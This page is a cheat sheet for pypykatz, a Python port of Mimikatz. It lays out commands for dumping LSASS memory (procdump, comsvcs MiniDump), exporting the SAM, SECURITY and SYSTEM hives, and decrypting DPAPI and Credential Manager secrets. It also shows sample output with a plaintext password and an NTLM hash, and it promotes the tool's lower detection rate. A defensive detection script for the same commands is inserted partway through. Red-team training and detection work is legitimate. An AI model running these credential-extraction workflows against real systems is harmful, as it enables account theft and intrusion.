pypykatz

pypykatz is a Python implementation of Mimikatz, allowing credential extraction and DPAPI attacks without requiring native Windows binaries. It can parse LSASS dumps offline (cross-platform) or attack live systems on Windows. This makes it ideal for situations where running the original Mimikatz is not possible or would trigger detection.

Key Capabilities

  • Offline Analysis: Parse LSASS memory dumps from any OS (Linux, macOS, Windows)
  • Live LSASS Access: Extract credentials from running LSASS process (Windows only)
  • DPAPI Attacks: Decrypt DPAPI-protected secrets including Credential Manager
  • Registry Parsing: Extract secrets from SAM, SECURITY, and SYSTEM hives
  • Cross-Platform: Works on Linux, macOS, and Windows

Installation

# Via pip
pip3 install pypykatz

# From GitHub
git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
pip3 install .

Basic Usage

Parse LSASS Memory Dump

pypykatz lsa minidump lsass.dmp

Parse LSASS Dump (JSON Output)

pypykatz lsa minidump lsass.dmp -o json > creds.json

Live LSASS Extraction (Windows, requires admin)

pypykatz live lsa

Parse Registry Hives Offline

pypykatz registry --sam SAM --security SECURITY --system SYSTEM

Credential Manager / DPAPI Attacks

Decrypt Credential Files

# Decrypt a single credential file
pypykatz dpapi credential <credential_file> <masterkey>

# Decrypt all credentials in a directory
pypykatz dpapi credentials <credentials_dir> --mkf <masterkey_file>

Decrypt Vault Credentials

pypykatz dpapi vcrd <vcrd_file> <masterkey>

Extract DPAPI Masterkeys from LSASS Dump

pypykatz lsa minidump lsass.dmp | grep -A5 "dpapi"

Decrypt Masterkey File

# With user password
pypykatz dpapi masterkey <masterkey_file> -p <password>

# With domain backup key
pypykatz dpapi masterkey <masterkey_file> --pvk <domain_backup_key.pvk>

# With SID and password
pypykatz dpapi prekey password <SID> <password>

LSASS Dump Analysis

Full Credential Dump

pypykatz lsa minidump lsass.dmp

Output Formats

Option     Description
---------  ------------------------------
-o json    JSON output
-o grep    Grep-friendly output
-o text    Human-readable text (default)

Parse Multiple Dumps

pypykatz lsa minidump dump1.dmp dump2.dmp dump3.dmp

Recursive Directory Parsing

pypykatz lsa minidump /path/to/dumps/ -r

Registry Attacks

Dump SAM Database

pypykatz registry --sam SAM --system SYSTEM

Dump LSA Secrets

pypykatz registry --security SECURITY --system SYSTEM

Dump Cached Domain Credentials

pypykatz registry --security SECURITY --system SYSTEM

Full Registry Extraction

pypykatz registry --sam SAM --security SECURITY --system SYSTEM

Common Workflows

Workflow 1: Offline LSASS Analysis

# On target: Create minidump (various methods)
procdump.exe -ma lsass.exe lsass.dmp
# or: rundll32 comsvcs.dll MiniDump <PID> lsass.dmp full
# or: Task Manager > Details > lsass.exe > Create dump file

# On attacker machine (any OS)
pypykatz lsa minidump lsass.dmp

Workflow 2: Credential Manager Extraction

# 1. Locate credential files
# User credentials: %AppData%\Microsoft\Credentials\
# System credentials: %SystemRoot%\System32\config\systemprofile\...

# 2. Locate masterkey files
# %AppData%\Microsoft\Protect\<SID>\

# 3. Get masterkey from LSASS dump
pypykatz lsa minidump lsass.dmp | grep -i dpapi

# 4. Decrypt credential file
pypykatz dpapi credential <credential_file> <masterkey_guid>:<masterkey_hex>

Workflow 3: Offline Registry Attack

# On target: Export registry hives (requires admin)
reg save HKLM\SAM SAM
reg save HKLM\SECURITY SECURITY
reg save HKLM\SYSTEM SYSTEM

# On attacker machine
pypykatz registry --sam SAM --security SECURITY --system SYSTEM
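A defender-side counterpart to Workflows 1 and 3, added here as an example and not part of the original page or the pypykatz project: it scans constructed Sysmon-style process-creation log lines for the LSASS dump and hive export commands shown above. The rule names, JSON field names and sample log lines are assumptions, and the Task Manager path (no command line) would need file-creation telemetry instead.

```python
import json
import re

# Constructed sample process-creation log lines (Sysmon Event ID 1 style,
# one JSON object per line); not real telemetry. The suspicious lines mirror
# the on-target commands from Workflows 1 and 3; the last two are benign.
SAMPLE_LOG = r'''
{"Image": "C:\\Tools\\procdump.exe", "CommandLine": "procdump.exe -ma lsass.exe lsass.dmp"}
{"Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32 comsvcs.dll MiniDump 624 lsass.dmp full"}
{"Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg save HKLM\\SAM SAM"}
{"Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg save HKLM\\SOFTWARE soft.hiv"}
{"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe lsass_notes.txt"}
'''.strip()

# Each rule is (assumed rule name, regex over the command line). Matching is
# case-insensitive because Windows command lines are.
RULES = [
    ("procdump_lsass", re.compile(r"procdump(?:64)?(?:\.exe)?\s+.*-ma\s+lsass", re.I)),
    ("comsvcs_minidump", re.compile(r"comsvcs(?:\.dll)?[\s,]+MiniDump", re.I)),
    ("reg_save_secret_hive",
     re.compile(r"reg(?:\.exe)?\s+save\s+HKLM\\(SAM|SECURITY|SYSTEM)\b", re.I)),
]


def classify(event):
    """Return the names of all rules whose pattern matches the event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_log(text):
    """Parse JSON-lines log text and return (rule_name, command_line) pairs for hits."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for name in classify(event):
            hits.append((name, event["CommandLine"]))
    return hits


if __name__ == "__main__":
    for name, cmd in scan_log(SAMPLE_LOG):
        print(f"[{name}] {cmd}")
```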

Output Examples

LSASS Dump Output

== LogonSession ==
authentication_id 630472 (99ec8)
session_id 3
username mcharles
domainname SRV01
logon_server SRV01
logon_time 2025-04-27T02:40:32
sid S-1-5-21-1340203682-1669575078-4153855890-1002
        == CREDMAN [00000000] ==
        username mcharles@inlanefreight.local
        domain onedrive.live.com
        password p@ssw0rd123!

Registry Dump Output

============== SAM ==============
HBoot Key: a1b2c3d4...
SAM Key: e5f6g7h8...

== User: Administrator ==
RID: 500
NTLM: aad3b435b51404eeaad3b435b51404ee

Comparison with Mimikatz

Feature             pypykatz         Mimikatz
------------------  ---------------  --------------------
Platform            Cross-platform   Windows only
Live LSASS          Windows only     Windows
Offline LSASS       Any OS           Windows
Detection           Lower (Python)   Higher (well-known)
Dependencies        Python 3         None (standalone)
Kerberos attacks    Limited          Full support
Token manipulation  No               Yes

Useful Options

Option       Description
-----------  ------------------------------------------
-o <format>  Output format (json, grep, text)
-r           Recursive directory parsing
-k           Kerberos ticket extraction
--pvk        Domain backup key for masterkey decryption

Tool        Description
----------  ---------------------------------------
Mimikatz    Original Windows credential extraction
LaZagne     Multi-platform credential recovery
SharpDPAPI  C# DPAPI attacks
DonPAPI     Remote DPAPI extraction
Impacket    Python toolkit with secretsdump.py

Core Takeaways

  • Use pypykatz for offline analysis of LSASS dumps on non-Windows systems
  • Supports the same DPAPI attacks as Mimikatz for Credential Manager extraction
  • Lower detection rate compared to the native Mimikatz binary
  • Registry parsing provides SAM, LSA secrets, and cached credentials
  • JSON output enables easy parsing and automation